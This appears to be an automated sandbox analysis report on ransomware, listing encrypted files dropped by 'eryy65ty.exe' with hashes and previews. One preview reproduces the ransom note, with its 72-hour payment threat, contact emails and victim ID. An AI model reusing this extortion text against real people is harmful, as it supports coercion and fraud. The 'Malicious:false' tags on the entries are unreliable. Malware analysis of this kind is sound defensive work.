                                                                                                    SHA1:ABE9B467D7DF4A4D2A4524A9C3B2F1F9DE5D629A
                                                                                                    SHA-256:61E4FBBE37849880A459BF9D53924F9D0806AF724CF81422BF0DC7078FBA3DD7
                                                                                                    SHA-512:6CBC5B6CA98036DCAF893B3CCD24975762240B0D08F84FF200148670946EAA5E75B1EABE8930726022501FFA947CB081C76BB444BA211B29DD1A66B8A300D5E5
                                                                                                    Malicious:false
                                                                                                    Preview:...Y>....g:.S..6........B....e%..}'...Q.P...;L.P...R....U..._..0...v8.&E..}..(,.........>....^.;.p...D.B.t.....C.[4Y..Y.J.G....U.a.....w3..a...!..c.b.N......:Ty2gz..kQ..xf..Zq.rbe.....@.4.7>...H...<.....7.......R..B...r./.P.....).B.....4.@...L...>,. .x...>.ml(.)JX..F-....B..=XAx.W.c.3...W.....z.s...x.kBD..F..sD.l....}M?.g.Up......e..x..6G.m!....2.....}....3.hNF|*U.}#....)....9a`8Q=..o.....~.+.yT.{...T....Vg+....&.6..O....-;...m]z>..C...X.P..x...Q...[.k.o.*..Q...+..1....r..s..%.jw..P*...&a.......?...=.. l.=......F/...E.....+L?...T.H..i..7.[.%.(.7.}L.|...T0..P...ti.:4.Fi.-.R...T..`...&."....l.}......Nu..vv....|..F.Nh..\.8.!Z.Z."||.oX.HJ...}...K.8i?M`.c.qc.oM.4.W}..3t.{.....B....%....zH.x..!>..Nw.fW9a..dV.h.9....*.../.^....#\.^.uI....]L...T$...4j.l^..ou...D8...TP......6.#Ko.8,.K+..C1.C.U4%..+E..i.v.;y.y.INTF.?H...z..t.y.#..,".>.$.B.../.v..GL.NK.....3...1.....e|$0.b.({E....Z.....\LPD.O.Sc.......W..l.%.-..%-K.;&....z....s..F.......~I.M...B{"..\T
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847707543132751
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BPlzY8Cxpl2R2f96eXxdKurb5dQWdBFqnKgibOd0eWjGQka02uL6riLdK/POYGIJ:w8Cxz24vWnnz0eW9ka03WAIPH
                                                                                                    MD5:25B60FC823339F04E96A4FD99CA11731
                                                                                                    SHA1:BE0D8A36F5C6AB7E0276AB99B5D9283AE9696C57
                                                                                                    SHA-256:7FBA134B018F5B1A17B00CF267ACA43AF3EFC465EF7016A1BBA8F523F2D91819
                                                                                                    SHA-512:B878C935FD6A4A126ECB563448FC3351D35BFAC6753CA460495B5D584B8FDDE3B66B6216F769F8C1ED30EBF958FFB26CC9F1385BE1F9F6AD8E1BECCC8BFC910A
                                                                                                    Malicious:false
                                                                                                    Preview:.HH..G.?.t........M.]..........m}c&0.. D.'.......'6..r..H....-K..Z...H..jM...v0..._w....k.......{x...T.....Z.H.N.w8.1...0..2.F./.....1.S.+..T..|..W./....}..Y+...%E+...B.............3.....j....$M.(.w...."..;.....:L.{$.(.a..<d..4.KV..7q.v.......m....x..+..%..+...6y.....(....0%p.:...\..q.h.d.+.cU.s.......O.0}...}.;-....G.h..T.....W....h...:....[.S....]?.~V.oJ.7M..Z...<.).hX.xC..2.9..&U...0...=b.L.....V=o;.....#..7..lxYm.n1...KzRsh.....?s.~...Q.\Az.+....7.".U...E4..,d(......k).|&........<.0..k^u..Y...h.}2>.n;l......03/.G...:C...*.....7.)4).#.) l.q+..t.1..l..:....%..M...|...{.w..I...VBG...`....l....{.Gw^i.Xr%F.`Y.A...d? ....S....w....i.j....E..'_.D> .....]......;Z....$....x..r&.O.L.. u.a...l...f.`.&.a~.....X7....s....P.M.Na....(d...3."..c......2.Gb......e.)]o../..O....{[s.=.t.ok.O*...P....)..fLW.J.c.It=Ak....K<.f...]..$dX.......N$.4T..V.0.r.J=MG..y...(*<._.eolE.`.kT.z.^.2..._@..i.."8.........&..)c.:....[.I....M.g.:.X...!.?H..d!..`.XC.i....<.t
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.847707543132751
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BPlzY8Cxpl2R2f96eXxdKurb5dQWdBFqnKgibOd0eWjGQka02uL6riLdK/POYGIJ:w8Cxz24vWnnz0eW9ka03WAIPH
                                                                                                    MD5:25B60FC823339F04E96A4FD99CA11731
                                                                                                    SHA1:BE0D8A36F5C6AB7E0276AB99B5D9283AE9696C57
                                                                                                    SHA-256:7FBA134B018F5B1A17B00CF267ACA43AF3EFC465EF7016A1BBA8F523F2D91819
                                                                                                    SHA-512:B878C935FD6A4A126ECB563448FC3351D35BFAC6753CA460495B5D584B8FDDE3B66B6216F769F8C1ED30EBF958FFB26CC9F1385BE1F9F6AD8E1BECCC8BFC910A
                                                                                                    Malicious:false
                                                                                                    Preview:.HH..G.?.t........M.]..........m}c&0.. D.'.......'6..r..H....-K..Z...H..jM...v0..._w....k.......{x...T.....Z.H.N.w8.1...0..2.F./.....1.S.+..T..|..W./....}..Y+...%E+...B.............3.....j....$M.(.w...."..;.....:L.{$.(.a..<d..4.KV..7q.v.......m....x..+..%..+...6y.....(....0%p.:...\..q.h.d.+.cU.s.......O.0}...}.;-....G.h..T.....W....h...:....[.S....]?.~V.oJ.7M..Z...<.).hX.xC..2.9..&U...0...=b.L.....V=o;.....#..7..lxYm.n1...KzRsh.....?s.~...Q.\Az.+....7.".U...E4..,d(......k).|&........<.0..k^u..Y...h.}2>.n;l......03/.G...:C...*.....7.)4).#.) l.q+..t.1..l..:....%..M...|...{.w..I...VBG...`....l....{.Gw^i.Xr%F.`Y.A...d? ....S....w....i.j....E..'_.D> .....]......;Z....$....x..r&.O.L.. u.a...l...f.`.&.a~.....X7....s....P.M.Na....(d...3."..c......2.Gb......e.)]o../..O....{[s.=.t.ok.O*...P....)..fLW.J.c.It=Ak....K<.f...]..$dX.......N$.4T..V.0.r.J=MG..y...(*<._.eolE.`.kT.z.^.2..._@..i.."8.........&..)c.:....[.I....M.g.:.X...!.?H..d!..`.XC.i....<.t
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.831373022148124
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ssm6O7yqf7mY8MLzieEQECUMLCuyXLsGZQhuLYN1BTCOQVIqtqZn3j3NTY/Q:06O2tc3ioEImVpZyuL4nCO2I1JzNTYI
                                                                                                    MD5:23665435727C8844C02C14CA27A7CE06
                                                                                                    SHA1:88DA0004FDDD0540698C07E5BD02164DC986CDB5
                                                                                                    SHA-256:95E32EF7067FA80196D277F0AC9894298DF8C899F80420B1B4EFCD2D319F0C90
                                                                                                    SHA-512:B8B3BC65514196396658AF9E8E668AA76F0224C5C702492FD2285E1CFFDC9F22ECA501494117F773AE1CC4816B24EB8D79DF235AC92B940E856CC9870BCB792A
                                                                                                    Malicious:false
                                                                                                    Preview:a..C2n..{4.m..EE...R......~7G_;.M..fhDd....S.}..1h.....v...5.......x....$...a...?...w[h%...[)C.(..@....H..Z1G..Ov..I.=!.......y.Z.*OMK..6...OR.Wq+|....~ Lw|......V..*vd4.B...x..K..._.....!.._...:.w..r;..S.Zt....k.a#..x....p..|X._.~.T...@:.qw..U..m....H .jR.4........RM..g.d.g.Z.p#..:.4.z..4dN.....i.....O...#...`B..H..r..y......hQ..~......n..}.....x.=......D..(2.7[...O..D.zVH..o.../F.;.+d....c..h....b._..k.....-/o..2..1......'.a...pS.vYO.S...$.@hE=*]A..#.'..B.HP.{{.l.^..2,..~...# .B...q|.L.2..1a....R.T.-.;.}...K.A....=.z,./..I.....C~.N..O...r9%.....co...mD.GeG.Z-pT%..A.<..H>..bD_j...9.B........RS0...j.J....q...g.F44F..W:.}D....|..L...+i .1 .6(.1...cX...,.#....X3.E8 ..o..wIm.OW...`\Y`u...t`...M...D.......h.... s..A..V5<.#,4+....1.......c..JV..Ob.u...Dg.I..s..\.t..;-.E)}...Z|.K...4.........K.m.|w..u.C}..`...](7X.F..q..yS..r...... ..O....i..1.c...x....5...PE. E..).oa~......B..pSI.T.-.M=6.F.r...42[..j.#..]hi.sd.7.>....-...Y"3..Y......O=..u.... Xp9.P..T'
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.831373022148124
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ssm6O7yqf7mY8MLzieEQECUMLCuyXLsGZQhuLYN1BTCOQVIqtqZn3j3NTY/Q:06O2tc3ioEImVpZyuL4nCO2I1JzNTYI
                                                                                                    MD5:23665435727C8844C02C14CA27A7CE06
                                                                                                    SHA1:88DA0004FDDD0540698C07E5BD02164DC986CDB5
                                                                                                    SHA-256:95E32EF7067FA80196D277F0AC9894298DF8C899F80420B1B4EFCD2D319F0C90
                                                                                                    SHA-512:B8B3BC65514196396658AF9E8E668AA76F0224C5C702492FD2285E1CFFDC9F22ECA501494117F773AE1CC4816B24EB8D79DF235AC92B940E856CC9870BCB792A
                                                                                                    Malicious:false
                                                                                                    Preview:a..C2n..{4.m..EE...R......~7G_;.M..fhDd....S.}..1h.....v...5.......x....$...a...?...w[h%...[)C.(..@....H..Z1G..Ov..I.=!.......y.Z.*OMK..6...OR.Wq+|....~ Lw|......V..*vd4.B...x..K..._.....!.._...:.w..r;..S.Zt....k.a#..x....p..|X._.~.T...@:.qw..U..m....H .jR.4........RM..g.d.g.Z.p#..:.4.z..4dN.....i.....O...#...`B..H..r..y......hQ..~......n..}.....x.=......D..(2.7[...O..D.zVH..o.../F.;.+d....c..h....b._..k.....-/o..2..1......'.a...pS.vYO.S...$.@hE=*]A..#.'..B.HP.{{.l.^..2,..~...# .B...q|.L.2..1a....R.T.-.;.}...K.A....=.z,./..I.....C~.N..O...r9%.....co...mD.GeG.Z-pT%..A.<..H>..bD_j...9.B........RS0...j.J....q...g.F44F..W:.}D....|..L...+i .1 .6(.1...cX...,.#....X3.E8 ..o..wIm.OW...`\Y`u...t`...M...D.......h.... s..A..V5<.#,4+....1.......c..JV..Ob.u...Dg.I..s..\.t..;-.E)}...Z|.K...4.........K.m.|w..u.C}..`...](7X.F..q..yS..r...... ..O....i..1.c...x....5...PE. E..).oa~......B..pSI.T.-.M=6.F.r...42[..j.#..]hi.sd.7.>....-...Y"3..Y......O=..u.... Xp9.P..T'
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.849606694728611
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:o1/d/R9R9u5YxqNpiwXYFUIWPjQ1i4gca0LggzP6W3oaTzXnqT31i:Sd59R9u5YUhIWPjQUUVPhpTzXnK8
                                                                                                    MD5:C7C829F491E21121969E7DB65D117574
                                                                                                    SHA1:9E932373FDBDB45E6008F7B1D2B370FF0D248EDD
                                                                                                    SHA-256:A163BCB0319EFC1B31D99316C4781C2257C2D1E273959B49243E9EF4551E6C6F
                                                                                                    SHA-512:926E66E5ED94E328BA620711FA194869CB119407385B908D46C84E5FE2AF4D3C4CB21246B70744F1892AADC39F3443A1E59A6B0DF29B4AEDA725036BBA0FA391
                                                                                                    Malicious:false
                                                                                                    Preview:..%8q...hm.@S...{.1...P......=[....;W.j.e.A...J/a>H<..@...-).-.....u..7.r.<f..^a. yS"...).?\..XC.......\.I.v..T...S.u8EI......V..Hf...V...bZ..<.N......M].....OFe,.au}.P......sp!S..6.6.`..v......n2...l...w.R.....X......qs`zE|.m.6......R.....)G8...../...2..Y.........u.........tgT%F.=..N..!.`..3&....F.O.#..ue..m.)O..4..h.U,...$...Z3.z.5..-[...?.V.}..p.RX..L@FUU.....^,Y./...1..U..x]3.. m.c......Z..2....w..m..XN.}.jv...T.C.b..e.trDf`...e*...qh..,...q.1.*.` T.A.......S.Z/....s.a{S.@....\$....`5.,..i.._Mbt...MDz.QX..C.O.F.qA.&....a.n.../D.te....%1L...'..q!.(#.r.2t..M.........5........|...S.#Sj...F.?........M..g.cs....E..?I.....[XD...|..hg<...u..,DRa!9I>dm..|..m.....9.(X-\.(..:Q!.Q.;..?....7.....PjL..... fP.#...u.tL.?).0...`.$. ..2......LV.H....]..NO...v...w.....]YZ)r%u..}..=....H.@....c...E^1..1....J..7.N\.1..8K*L 7 ...*.j..)^........R.....V.xl.?.53..~~G.,.#........D.x.J..X..m.o...ji.z...I.Qa\.K.L.d.....@.qd.5...t....2..T..^..W.....l@.>.g[.f
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.849606694728611
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:o1/d/R9R9u5YxqNpiwXYFUIWPjQ1i4gca0LggzP6W3oaTzXnqT31i:Sd59R9u5YUhIWPjQUUVPhpTzXnK8
                                                                                                    MD5:C7C829F491E21121969E7DB65D117574
                                                                                                    SHA1:9E932373FDBDB45E6008F7B1D2B370FF0D248EDD
                                                                                                    SHA-256:A163BCB0319EFC1B31D99316C4781C2257C2D1E273959B49243E9EF4551E6C6F
                                                                                                    SHA-512:926E66E5ED94E328BA620711FA194869CB119407385B908D46C84E5FE2AF4D3C4CB21246B70744F1892AADC39F3443A1E59A6B0DF29B4AEDA725036BBA0FA391
                                                                                                    Malicious:false
                                                                                                    Preview:..%8q...hm.@S...{.1...P......=[....;W.j.e.A...J/a>H<..@...-).-.....u..7.r.<f..^a. yS"...).?\..XC.......\.I.v..T...S.u8EI......V..Hf...V...bZ..<.N......M].....OFe,.au}.P......sp!S..6.6.`..v......n2...l...w.R.....X......qs`zE|.m.6......R.....)G8...../...2..Y.........u.........tgT%F.=..N..!.`..3&....F.O.#..ue..m.)O..4..h.U,...$...Z3.z.5..-[...?.V.}..p.RX..L@FUU.....^,Y./...1..U..x]3.. m.c......Z..2....w..m..XN.}.jv...T.C.b..e.trDf`...e*...qh..,...q.1.*.` T.A.......S.Z/....s.a{S.@....\$....`5.,..i.._Mbt...MDz.QX..C.O.F.qA.&....a.n.../D.te....%1L...'..q!.(#.r.2t..M.........5........|...S.#Sj...F.?........M..g.cs....E..?I.....[XD...|..hg<...u..,DRa!9I>dm..|..m.....9.(X-\.(..:Q!.Q.;..?....7.....PjL..... fP.#...u.tL.?).0...`.$. ..2......LV.H....]..NO...v...w.....]YZ)r%u..}..=....H.@....c...E^1..1....J..7.N\.1..8K*L 7 ...*.j..)^........R.....V.xl.?.53..~~G.,.#........D.x.J..X..m.o...ji.z...I.Qa\.K.L.d.....@.qd.5...t....2..T..^..W.....l@.>.g[.f
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.864815235380432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:XwOr/WIyeCkZI+h2F1rf3z+4oGTQJDmDGFu9TfScw0Hhb6C4Rm1VOvMft+oLxu6o:X3OlC2SIJGGTiD9FuRqcw0BwRmT3fhx+
                                                                                                    MD5:680022D6DB56CB94AFCE2CAE90D2A100
                                                                                                    SHA1:49CD210D35D4F5A21412939A58CE25DB02DE60AD
                                                                                                    SHA-256:ED4145E8DCB4647222513315D30241034E6D9FEEA7D87CA1EA8B7688D3C131A4
                                                                                                    SHA-512:F6B55FAD335C48D4C70E4CF6EF3E8A036217182E8C0E87B6FD5AD0685F0C039D4F758B31914C8985DEC7171F7A1FF4730CA1FA84A5218C8A88424489B18A5092
                                                                                                    Malicious:false
                                                                                                    Preview:k..-......=::W..mh..<3x...(..$...WC.d...Z.../.X}.E..6.7.};....f..]./.Z,...........+...MB.T....\M@...g.,.*..Q..8P...{..........8...B7."..qS`..co.C............hN...J3X..e..E.yA.e0....kC..+-..T...2?s.R.V,..z.|ObH.......k4.c.amB..........v..k=...K..u^.......V...|m....;..L..<....;..5...f.z.d`|..$...[M.../...q..7....t'f..W...Yl.E.E8.......{....F1.{..T"..<....UEPY"..KP.j..O.....}?.Dw...z=8.j.&...8.V.JV_.P.....kc.r\o...Z,.PErS..<.6..%Z.c..v .6.d..|e.8.........t...:..Y.X.-v..^..8..q.F~.W\e=._...N!.1.V.............z.G{...Te<..66.R[u.J..W......5[..2f.Uv.S*).@d........b.......1...r+^6..\XA.MJ.......$....b.,.V.6......780r......@.._+GbI.F..j....+.URm...O...,..2.x.0.8.D....R..A..3..b........-.b..$..p/.!..4Q.d.V.y......?.mn+.g.F.`..T....|S.L...=&..A.P.........Q.jh@.1...5...,.|..i.3.....v/.~_..c..m.n..K...I.u.o.9.....,.W.....S..T..V.wL.....Vh.n.o.a...I...).. ./..9~..Ch.tr3..z...u.~..}T...y.q4>...cM.....!.._m.?+. S8...P7|...%x.C..G.[...9......=~n............uu
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.864815235380432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:XwOr/WIyeCkZI+h2F1rf3z+4oGTQJDmDGFu9TfScw0Hhb6C4Rm1VOvMft+oLxu6o:X3OlC2SIJGGTiD9FuRqcw0BwRmT3fhx+
                                                                                                    MD5:680022D6DB56CB94AFCE2CAE90D2A100
                                                                                                    SHA1:49CD210D35D4F5A21412939A58CE25DB02DE60AD
                                                                                                    SHA-256:ED4145E8DCB4647222513315D30241034E6D9FEEA7D87CA1EA8B7688D3C131A4
                                                                                                    SHA-512:F6B55FAD335C48D4C70E4CF6EF3E8A036217182E8C0E87B6FD5AD0685F0C039D4F758B31914C8985DEC7171F7A1FF4730CA1FA84A5218C8A88424489B18A5092
                                                                                                    Malicious:false
                                                                                                    Preview:k..-......=::W..mh..<3x...(..$...WC.d...Z.../.X}.E..6.7.};....f..]./.Z,...........+...MB.T....\M@...g.,.*..Q..8P...{..........8...B7."..qS`..co.C............hN...J3X..e..E.yA.e0....kC..+-..T...2?s.R.V,..z.|ObH.......k4.c.amB..........v..k=...K..u^.......V...|m....;..L..<....;..5...f.z.d`|..$...[M.../...q..7....t'f..W...Yl.E.E8.......{....F1.{..T"..<....UEPY"..KP.j..O.....}?.Dw...z=8.j.&...8.V.JV_.P.....kc.r\o...Z,.PErS..<.6..%Z.c..v .6.d..|e.8.........t...:..Y.X.-v..^..8..q.F~.W\e=._...N!.1.V.............z.G{...Te<..66.R[u.J..W......5[..2f.Uv.S*).@d........b.......1...r+^6..\XA.MJ.......$....b.,.V.6......780r......@.._+GbI.F..j....+.URm...O...,..2.x.0.8.D....R..A..3..b........-.b..$..p/.!..4Q.d.V.y......?.mn+.g.F.`..T....|S.L...=&..A.P.........Q.jh@.1...5...,.|..i.3.....v/.~_..c..m.n..K...I.u.o.9.....,.W.....S..T..V.wL.....Vh.n.o.a...I...).. ./..9~..Ch.tr3..z...u.~..}T...y.q4>...cM.....!.._m.?+. S8...P7|...%x.C..G.[...9......=~n............uu
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854664053513878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:F3lppGu7kcGWkyO8dLetR2yrTLykr7jmtKYDx7lFY9F4GCeigRD0ucYKnRji3:5pf7knwO8dqtfTLzrXmtKe72F4GCexoO
                                                                                                    MD5:BB2FA76318125D4F64CDC8898BBFE19C
                                                                                                    SHA1:E19E64FE92FAEB9FBBA43C434818DD943298E05C
                                                                                                    SHA-256:2F3DFFB9D46C5DFAE892AEFAEC31E067BF84D63412D02D64DFBF5CD305C61F5E
                                                                                                    SHA-512:B47851181A30AB5E75DAF3A6DC68CE1D88DAD83FF7450C50EF93E0470B68A0ACAFB8108AA537BCACD6E57766379D21D85AAA05AB8E8DF79C4125F85ACF4D4873
                                                                                                    Malicious:false
                                                                                                    Preview:.V:.r1%f.1.8d....Y..&.N.X.EQ^0.D(v.......6....i.].R..E..W.U.Z..N.....B.P...%(.]TXg..G..<.e/U.uU~i......`.>...6~...8.D.........n...+0v..E.G.O.6.;\.c..E.N...b43v5...7...N.qE.8..yYJ...`60M.....~.'E..'bj:..4.8-.....0&.Hs.!H.1Y.Q.zW..',..X.1F..F4..Mz......'..H.h8.0..M...-.......b.*J..].x...0&...._.L....h?.&.iFt.......5/..r?KT..-=....f0*'.....=....G....z}].U+.#el.L...0.g...)_..}...w..Rp$...}^...I..S.-r.a.zf@..$..g.s...AIM.Q....w.y..P..b.]...Y.R."...f..%............$.....da..|...wZ..~;...2..u.......Ev.&.A..-....K.>l..... ~.-1....P..e.'dX..YlZ......9.dI5Lt.............wI...e......v.?}<....2..&...YeY...jW.....n..|...}.oQvN...<.H.x...u.5.......d..s..UN^..ZRA....@..M.../m......j.s.#q.}T..J.'g $.}P..fY._tL.......G...*..]Vq.^....y..'L5..?...V...n^..[.......B......=..J.. .*;...v_p..&.q...=..k...Xj....0B3G(D}H.V;t..R|.-...=.4......M..~....d.W.l....9.....%....c...;wz..q.6.o_.r~....C..kZ$H..V@.h...-....xT..[....I....w.?5..qr].%.f..^C.........uRDzQ..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854664053513878
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:F3lppGu7kcGWkyO8dLetR2yrTLykr7jmtKYDx7lFY9F4GCeigRD0ucYKnRji3:5pf7knwO8dqtfTLzrXmtKe72F4GCexoO
                                                                                                    MD5:BB2FA76318125D4F64CDC8898BBFE19C
                                                                                                    SHA1:E19E64FE92FAEB9FBBA43C434818DD943298E05C
                                                                                                    SHA-256:2F3DFFB9D46C5DFAE892AEFAEC31E067BF84D63412D02D64DFBF5CD305C61F5E
                                                                                                    SHA-512:B47851181A30AB5E75DAF3A6DC68CE1D88DAD83FF7450C50EF93E0470B68A0ACAFB8108AA537BCACD6E57766379D21D85AAA05AB8E8DF79C4125F85ACF4D4873
                                                                                                    Malicious:false
                                                                                                    Preview:.V:.r1%f.1.8d....Y..&.N.X.EQ^0.D(v.......6....i.].R..E..W.U.Z..N.....B.P...%(.]TXg..G..<.e/U.uU~i......`.>...6~...8.D.........n...+0v..E.G.O.6.;\.c..E.N...b43v5...7...N.qE.8..yYJ...`60M.....~.'E..'bj:..4.8-.....0&.Hs.!H.1Y.Q.zW..',..X.1F..F4..Mz......'..H.h8.0..M...-.......b.*J..].x...0&...._.L....h?.&.iFt.......5/..r?KT..-=....f0*'.....=....G....z}].U+.#el.L...0.g...)_..}...w..Rp$...}^...I..S.-r.a.zf@..$..g.s...AIM.Q....w.y..P..b.]...Y.R."...f..%............$.....da..|...wZ..~;...2..u.......Ev.&.A..-....K.>l..... ~.-1....P..e.'dX..YlZ......9.dI5Lt.............wI...e......v.?}<....2..&...YeY...jW.....n..|...}.oQvN...<.H.x...u.5.......d..s..UN^..ZRA....@..M.../m......j.s.#q.}T..J.'g $.}P..fY._tL.......G...*..]Vq.^....y..'L5..?...V...n^..[.......B......=..J.. .*;...v_p..&.q...=..k...Xj....0B3G(D}H.V;t..R|.-...=.4......M..~....d.W.l....9.....%....c...;wz..q.6.o_.r~....C..kZ$H..V@.h...-....xT..[....I....w.?5..qr].%.f..^C.........uRDzQ..
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854389722790831
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KjZsVqc01lA7SjeBLFgpeeWap84T8Lyfo4/SCdTBEya+yGFsgSl2J9k30Y:vs7Q7LFNBj6o4/SeNEyz3SlH30Y
                                                                                                    MD5:E1CDFAEFBB2CBB51D4E3CEFBF9193B2F
                                                                                                    SHA1:466995C0FD13995594DC1D1C502F49540DEE05F7
                                                                                                    SHA-256:6BA9E96617F5DBFDCD1EA0F3305C5879AECEDFFFE95141892E81ADCE240310F6
                                                                                                    SHA-512:B5C6B33F1FF5B29A1D4E19155E4B186C9D3BF9A358A911E5172EC824F7EDC746ACF2CC7133A75AFDBD9D420376A18262B1E2E707EA10FFBDDE7C5096AD165FBB
                                                                                                    Malicious:false
                                                                                                    Preview:.'2.....Fc.^.|....D.1..L.%.5t.....{...7+..;~N..b6R'I..?!..PI.a..4b.K..5./^I...r.~g...m..2.e.+....".&....'.,..Rk.W..>U..e. .......JG}YM3S...N......=.mb.....N..]3...k..;v...u.....i....).7!:|..i...q.....N...'1H..>.I.ZL...p~+...AH&j............:....r.....dZY..W(.....Xk.o.3..4..a`%/)..&\.n........S..F__.o.\.._UT.._....rE&.E.......7."........6n..I..F`l..g..,.b.....T..z!e...Cx...-..}..3..&......?U*xx.6.u..I9....t.06r.u.b.WC.z...~...j......*...'.J....._vf.R..(.u..a>.Y....L.....>O.(.ZYy....N...8M...Z.."(.h.I.....u........d.....-...o....i.....`{..{.ZF...=..<./......$z......?>.k...E...t..IB.....{......[...H.N.C%y...d.V....Z..."..d!)(e}1gx^1..>.......{...br.hc..5x...t'^".8v.u(...aG....(T..4....\4....~....<..r.v......0U.|+....k....z.'.5..1Y.......{.B0...s.V...."...../<.....T......p.H..F-.....T....W.J.4.F.z.}...r.$..H....,..pIw.i.st....F9.6..j..G.......#.*...iwU;-?c....;h.-.y.F..6....j..TgM.%..Dkm.....$....\kda.......>.t......e+9.r.F..C..Y.gXCf..`...g.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.854389722790831
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KjZsVqc01lA7SjeBLFgpeeWap84T8Lyfo4/SCdTBEya+yGFsgSl2J9k30Y:vs7Q7LFNBj6o4/SeNEyz3SlH30Y
                                                                                                    MD5:E1CDFAEFBB2CBB51D4E3CEFBF9193B2F
                                                                                                    SHA1:466995C0FD13995594DC1D1C502F49540DEE05F7
                                                                                                    SHA-256:6BA9E96617F5DBFDCD1EA0F3305C5879AECEDFFFE95141892E81ADCE240310F6
                                                                                                    SHA-512:B5C6B33F1FF5B29A1D4E19155E4B186C9D3BF9A358A911E5172EC824F7EDC746ACF2CC7133A75AFDBD9D420376A18262B1E2E707EA10FFBDDE7C5096AD165FBB
                                                                                                    Malicious:false
